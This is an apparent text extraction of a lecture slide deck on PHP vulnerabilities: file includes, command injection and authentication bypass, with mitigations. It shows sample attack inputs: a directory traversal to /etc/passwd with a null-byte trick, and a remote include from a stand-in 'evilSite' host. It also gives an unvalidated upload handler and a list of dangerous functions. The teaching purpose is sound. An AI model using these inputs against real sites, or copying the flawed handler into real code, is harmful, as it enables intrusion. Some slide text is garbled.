Upload
abdul-rasheed
View
224
Download
0
Embed Size (px)
Citation preview
7/29/2019 Code Inject File Vuln Auth Bypass
1/44
Copyright Justin C. Klein Keane
PHP Vulnerability Potpourri
File Include, Command Injection & AuthenticationBypass Vulnerabilities
7/29/2019 Code Inject File Vuln Auth Bypass
2/44
Copyright Justin C. Klein Keane
File Include Vulnerabilities
Arbitrary file includes (reading)
Local file includes
Remote file includes
Directory traversal
Writing arbitrary files
7/29/2019 Code Inject File Vuln Auth Bypass
3/44
Copyright Justin C. Klein Keane
Basic PHP File Includes
Four common functions
include()
include_once()
require()
require_once()
Difference is that require will die (with fatal E_ERROR)if the specified file is not found
Include() will produce an E_WARNING
_once functions will not re-include the file if it hasalready been called
7/29/2019 Code Inject File Vuln Auth Bypass
4/44
Copyright Justin C. Klein Keane
How Includes Work
When PHP includes a file it will parse any PHPcode within that file
Anything not delimited with the PHP delimiters() will be treated as plain text
Plain text will simply be rendered inline
7/29/2019 Code Inject File Vuln Auth Bypass
5/44
Copyright Justin C. Klein Keane
Typical Include
7/29/2019 Code Inject File Vuln Auth Bypass
6/44
Copyright Justin C. Klein Keane
Problems with Includes
Arbitrary local file includes triggered viamalicious user input:
If user supplies ../../../../../../../etc/passwd as
the 'action' URL variable that file will berendered during page display!
7/29/2019 Code Inject File Vuln Auth Bypass
7/44
Copyright Justin C. Klein Keane
Incorrect Projection Schemes
Some programmers will append a file extensionto attempt to limit includes like /etc/passwd
This fails for several reasons, one is becausePHP is written in C
7/29/2019 Code Inject File Vuln Auth Bypass
8/44
Copyright Justin C. Klein Keane
Caveats of C
C doesn't have a string type
Instead strings are null terminated character arrays:char foo[3];
int main() {foo[0] = 'B';foo[1] = 'A';foo[2] = 'R';foo[3] = '\0';
}
Without the null at the end the string would have no end
C reads from the start of the string until it reaches the nullcharacter when printing strings
7/29/2019 Code Inject File Vuln Auth Bypass
9/44
Copyright Justin C. Klein Keane
Tricking PHP with C Conventions
Using a null character triggers C constructs anddefeats the prior example
If user passes in:action=../../../../../../etc/passwd%00
then PHP executes:include('inc/../.././../../etc/passwd');
Because PHP terminates the string at the nullbit (and ignores the appended '.php')
Most PHP programmers are unaware of this!
7/29/2019 Code Inject File Vuln Auth Bypass
10/44
Copyright Justin C. Klein Keane
Other Include Strategies
There are other ways around extensionprotections
Attacker can provide the GET var:?action=/path/to/other/php_file.php?
renders the final .php as a GET var to theincluded php_file.php
7/29/2019 Code Inject File Vuln Auth Bypass
11/44
Copyright Justin C. Klein Keane
Other Dangers of Includes
Often times include files are meant to beincluded, not directly referenced
Include files live on the filesystem May contain vulnerabilities when called directly
as variables could be redefined or arbitrarilydefined
Especially dangerous when register_globals ison!
7/29/2019 Code Inject File Vuln Auth Bypass
12/44
Copyright Justin C. Klein Keane
Example
Main file:
7/29/2019 Code Inject File Vuln Auth Bypass
13/44
Copyright Justin C. Klein Keane
Remote File Include
Rather than specifying a local resource, anattacker could specify a remote file for inclusion
Remote files must be served as plain text,rather than compiled PHP
Remote text is pulled for inclusion then the localPHP compiler interprets the text, rendering thePHP locally
7/29/2019 Code Inject File Vuln Auth Bypass
14/44
Copyright Justin C. Klein Keane
Remote File IncludeRequirements
/etc/php.ini has parameters that define the abilityof PHP to include files:
;;;;;;;;;;;;;;;;;;; Fopen wrappers ;;;;;;;;;;;;;;;;;;;
; Whether to allow the treatment of URLs (like http:// or
ftp://) as files.
allow_url_fopen = On
7/29/2019 Code Inject File Vuln Auth Bypass
15/44
Copyright Justin C. Klein Keane
If allow_url_fopen is On
Attackers can include remote files:
Attacker can call
?action=http://evilSite.tld/evil_script.txt?
7/29/2019 Code Inject File Vuln Auth Bypass
16/44
Copyright Justin C. Klein Keane
Other Include Strategies
Attackers can use includes to bypass direct accessrestrictions such as .htaccess
This could be used to expose files like config.ini files
Attackers can include Apache files like .htpasswd or.htaccess files which are included as plain text, exposingtheir contents
Attackers can subvert program flow by calling files that are
normally not included
Attackers can call files readable by Apache, such as filesin /tmp which may contain sensitive data (like sessioncookies or malicious uploads)
7/29/2019 Code Inject File Vuln Auth Bypass
17/44
Copyright Justin C. Klein Keane
Writing Files
PHP functionality used to write files include:
File upload functions built into an application
(such as image uploads) Utilizing PHP filesystem commands such as
fwrite()
7/29/2019 Code Inject File Vuln Auth Bypass
18/44
Copyright Justin C. Klein Keane
Typical Image Upload Handler
$upload_dir = "files/";$filename = basename($_FILES['form_filename']['name']);
$target = $upload_dir . $filename;
if(move_uploaded_file($_FILES['form_filename']['tmp_name'], $target)) {echo $filename . " has been uploaded";
}else{
echo "Error uploading file!";}
7/29/2019 Code Inject File Vuln Auth Bypass
19/44
Copyright Justin C. Klein Keane
Common Upload Errors
Collisions cause overwrites
File type is not checked
Programmer may assume only image files arebeing uploaded, but this isn't enforced
File type is checked inappropriately
Simply checking $_FILES['upload_file']['type'] is
insufficient since this is a browser providedparameter
Double extensions (and programmer only check thefirst one)
7/29/2019 Code Inject File Vuln Auth Bypass
20/44
Copyright Justin C. Klein Keane
Exploits for File Uploads
Attacker uploads a PHP file which contains abackdoor or exposes other system files
Attacker uploads a .htaccess file overwritingApache rules
Attacker overwrites existing files to insert abackdoor
7/29/2019 Code Inject File Vuln Auth Bypass
21/44
Copyright Justin C. Klein Keane
Fwrite()
The fwrite() function is a built in function thatallows Apache to write to file handles
Often used in installers to write config files Also commonly used for logging
For more information see:
http://us3.php.net/manual/en/function.fwrite.php
7/29/2019 Code Inject File Vuln Auth Bypass
22/44
What is Command Injection
Also known as arbitrary code execution
Attacker injects malicious input that is then
passed to functions that execute shellcommands based on the input
7/29/2019 Code Inject File Vuln Auth Bypass
23/44
Typical Example
7/29/2019 Code Inject File Vuln Auth Bypass
24/44
Injection Strategies
Shell commands are delimited by a semi-colon,so multiple commands can be chained together
The pound or hash (#) symbol denotes thebeginning of a comment on the shell, any textfollowing it will be ignored
Strategies similar to SQL injection can be
utilized
7/29/2019 Code Inject File Vuln Auth Bypass
25/44
Functions to Watch
Luckily, the list of commands which execute viaa shell is somewhat limited:
system() Executes the command and returns output
exec()
Executes command, can populate PHP
variables with output and return values passthru()
Executes command but only returns returnstatus
7/29/2019 Code Inject File Vuln Auth Bypass
26/44
Other Dangerous Functions
There are other, less common functions towatch out for
Backtick operators $retval = `ls -lh *.php`;
shell_exec()
Same as backtick
7/29/2019 Code Inject File Vuln Auth Bypass
27/44
Pipe Operations
PHP has commands that can open a pipe to aprocess, so input and output can be directed tothe process
popen() and pclose()
$proc = popen(/bin/ls, r);
proc_open()
Offers more command control
7/29/2019 Code Inject File Vuln Auth Bypass
28/44
Command Sanitization
PHP has two commands that can be used toscrub input before passing it to a command
escapeshellarg() Adds quotes around string and escapes any
internal quotes
escapeshellcmd()
Escapes all special characters that could beused to interrupt or override execution flow
Note that you should still strive to sanitize toknown good commands
7/29/2019 Code Inject File Vuln Auth Bypass
29/44
Other Nefarious Outliers
preg_replace with the /e flag allows forcommand execution
This is certainly not the first place you wouldlook to find command execution!
7/29/2019 Code Inject File Vuln Auth Bypass
30/44
Executing PHP Commands
Using the eval() command
Because of PHP's dynamic nature, variables
can actually be interpreted as commands:
7/29/2019 Code Inject File Vuln Auth Bypass
31/44
Mitigation
PHP's php.ini contains a rarely used directive:
; This directive allows you to disable certain functions for security reasons.
; It receives a comma-delimited list of function names. This directive is
; *NOT* affected by whether Safe Mode is turned On or Off.disable_functions = exec, system, passthru, eval
Won't completely cut off avenues of attack butcan limit the programmers power to introduce
vulnerabilities No way to limit backticks via php.ini
7/29/2019 Code Inject File Vuln Auth Bypass
32/44
Copyright Justin C. Klein Keane
Auth Bypass
Authentication bypass is a vulnerability thatallows an attacker to gain access tofunctionality without providing valid credentials
Attackers may seek to steal an authenticatedusers session
May also be possible to initiate a privileged
session without credentials Some functionality may not need a session
7/29/2019 Code Inject File Vuln Auth Bypass
33/44
Copyright Justin C. Klein Keane
Session Handling
PHP controls session data via a PHPSESSIDcookie by default (defined in php.ini)
7/29/2019 Code Inject File Vuln Auth Bypass
34/44
Copyright Justin C. Klein Keane
Session Cookies
Difficult to predict/guess
However, stored on the filesystem
Location determined by settings in /etc/php.inisession.save_path = "/var/lib/php/session"
; Whether to use cookies.session.use_cookies = 1; This option enables administrators to make their users invulnerable to; attacks which involve passing session ids in URLs; defaults to 0.; session.use_only_cookies = 1; Name of the session (used as cookie name).session.name = PHPSESSID; Initialize session on request startup.session.auto_start = 0; Lifetime in seconds of cookie or, if 0, until browser is restarted.session.cookie_lifetime = 0; The path for which the cookie is valid.session.cookie_path = /; The domain for which the cookie is valid.session.cookie_domain =
7/29/2019 Code Inject File Vuln Auth Bypass
35/44
Copyright Justin C. Klein Keane
Permissions on Session Dir
# ls -lah /var/lib/phptotal 156K
drwxr-xr-x 3 root root 4.0K Jun 2 12:13 .drwxr-xr-x 21 root root 4.0K Jun 2 12:42 ..drwxrwx--- 2 root apache 132K Jun 22 14:37 session
Note that apache can read and write in thisdirectory
7/29/2019 Code Inject File Vuln Auth Bypass
36/44
Copyright Justin C. Klein Keane
phpinfo() Disclosure
7/29/2019 Code Inject File Vuln Auth Bypass
37/44
Copyright Justin C. Klein Keane
Data Can be Leaked
If attacker can leverage webapp to list thecookie directory they can modify their owncookies
Cookie isn't tied to an IP, so cookie holderautomatically gains session access
Cookie can also be stolen from the end user
JavaScript can access cookies with domainrestrictions
7/29/2019 Code Inject File Vuln Auth Bypass
38/44
Copyright Justin C. Klein Keane
Logical Flaws
Application fails to check credentials properly
Name collisions for instance
These will not be programming errors so aremuch more difficult to detect
7/29/2019 Code Inject File Vuln Auth Bypass
39/44
Copyright Justin C. Klein Keane
Limited Authentication
Application may only check for authentication inone place
Some files may assume that authentication hastaken place but may be accessible outside ofthat flow
7/29/2019 Code Inject File Vuln Auth Bypass
40/44
Copyright Justin C. Klein Keane
Brute Force
Steps should be taken to limit authenticationattempts
At the very least log auth attempts and alertsomeone on multiple failures
Be sure to limit login failure feedback (don'talert an attacker to whether or not a username
or password exists) Be wary of password recovery functionality and
information it might disclose to an attacker
L t F il
7/29/2019 Code Inject File Vuln Auth Bypass
41/44
Copyright Justin C. Klein Keane
Logout Failure
Applications that don't properly end sessionscould leave them open for exploitation
Kiosks or other public terminals are primeoffenders in these circumstances
U t d A th ti ti
7/29/2019 Code Inject File Vuln Auth Bypass
42/44
Copyright Justin C. Klein Keane
Unencrypted Authentication
Cookies and/or post data may be stolen
Forms themselves should be encrypted, not just
their post targets MITM plain text keystroke loggers could be
utilized on unencrypted login forms
I f ti Di l
7/29/2019 Code Inject File Vuln Auth Bypass
43/44
Copyright Justin C. Klein Keane
Information Disclosure
There are many seemingly innocuous ways thatinformation valuable to an attacker can bedisclosed
Debugging messages
phpinfo() output can reveal configuration informaiton
Plain text files such as .ini or .htaccess or .htpasswdfiles could be exposed
Directory listing could show files that would otherwisebe difficult to find
HTML comments
E d I f ti
7/29/2019 Code Inject File Vuln Auth Bypass
44/44
Copyright Justin C. Klein Keane
Exposed Information
Assume any web accessible file can be read byan attacker
Tools for brute force guessing filenames anddirectories exist
Look at include files to make sure they can't beabused by being called directly